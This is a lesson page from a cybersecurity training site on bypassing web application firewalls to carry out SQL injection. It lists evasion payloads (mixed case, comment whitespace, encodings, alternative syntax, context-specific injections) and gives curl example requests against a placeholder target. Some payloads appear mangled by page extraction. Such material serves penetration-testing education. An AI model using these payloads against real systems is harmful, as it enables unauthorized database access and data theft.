Vulnarex | Elite Cybersecurity Learning Platform

#Bypassing WAFs and Input Filters#link

Modern applications employ Web Application Firewalls (WAFs) and input filters to block SQL injection. This advanced lesson covers techniques to bypass these defenses when standard payloads are blocked.

Building on our knowledge of various injection techniques, we now focus on evading the defensive measures that prevent these attacks from succeeding.

Understanding WAF Detection

WAFs typically use signature-based detection, looking for known attack patterns like UNION SELECT, OR 1=1, and common SQL keywords. Understanding how WAFs detect attacks helps in crafting evasion techniques.

Case Variation

Many filters only check for lowercase or uppercase keywords. Mixing case can bypass simple pattern matching.

bash

# Standard payload (might be blocked)
UNION SELECT

# Case variation (might bypass)
UnIoN SeLeCt

# Random case
uNiOn sElEcT

Whitespace Alternatives

Filters often look for spaces between keywords. Use comments, tabs, or other whitespace characters as alternatives.

bash

# Standard
UNION SELECT

# Using comments as whitespace
UNION//SELECT
UNION/foo/SELECT

# Using tabs or newlines
UNION%09SELECT
UNION%0ASELECT

# Multiple comments
UNION/a/
/b/SELECT

Keyword Splitting

Some databases allow splitting keywords with comments or special characters, which can bypass filters looking for complete keywords.

bash

# MySQL keyword splitting
UNI//ON SEL//ECT

# Using concatenation (MySQL)
CONCAT('UN','ION')

# Using char codes
CHAR(85,78,73,79,78)

Encoding Techniques

Various encoding methods can obfuscate payloads while still being interpreted correctly by the database.

bash

# URL encoding
%55%4E%49%4F%4E %53%45%4C%45%43%54

# Double URL encoding
%2555%254E%2549%254F%254E

# Unicode encoding (MySQL)
%u0055%u004E%u0049%u004F%u004E

# Hex encoding
0x554e494f4e2053454c454354

Alternative Syntax

Using less common SQL syntax can bypass filters that only look for standard patterns.

bash

# Instead of UNION SELECT
UNION ALL SELECT
UNION DISTINCT SELECT

# Instead of OR 1=1
OR 2>1
OR 'a'='a'
OR 1 LIKE 1

# Instead of SLEEP()
BENCHMARK(10000000,SHA1('test'))

# PostgreSQL alternative
pg_sleep() vs generate_series()

info

💡 Test evasion techniques systematically. Start with simple case variations and progress to more complex encoding if needed.

Context-Specific Bypasses

Different injection contexts (string, numeric, ORDER BY) require different bypass techniques.

bash

# String context - break out of quotes
' UNION SELECT 1,2,3--
\' UNION SELECT 1,2,3--

# Numeric context - no quotes needed
1 UNION SELECT 1,2,3--
1 AND 1=1--

# ORDER BY context
ORDER BY 1--
ORDER BY (SELECT 1)--

STRICT SECURE AUDIT RULE

⚠️ Advanced evasion techniques may violate testing scope agreements. Always confirm that WAF bypass testing is explicitly authorized.

Practical Example

WAF Bypass in Action

root@vulnarex:~## Standard payload blocked curl 'http://target.com/search.php?q=UNION(opens in new tab) SELECT 1,2,3--' # Response: 403 Forbidden - WAF Blocked # Case variation bypasses curl 'http://target.com/search.php?q=UnIoN(opens in new tab) SeLeCt 1,2,3--' # Response: 200 OK - Data returned # Comment insertion bypasses curl 'http://target.com/search.php?q=UNION/(opens in new tab)/SELECT//1,2,3--' # Response: 200 OK - Data returned

quiz BLOCK (★ 50 XP)

Which evasion technique is most effective against signature-based WAFs that look for 'UNION SELECT'?

Select your proof vectors above

Advanced Filter Evasion Techniques

#Bypassing WAFs and Input Filters#link

Understanding WAF Detection

Case Variation

Whitespace Alternatives

Keyword Splitting

Encoding Techniques

Alternative Syntax

Context-Specific Bypasses

Practical Example

Which evasion technique is most effective against signature-based WAFs that look for 'UNION SELECT'?

Verification Proof Checkpoint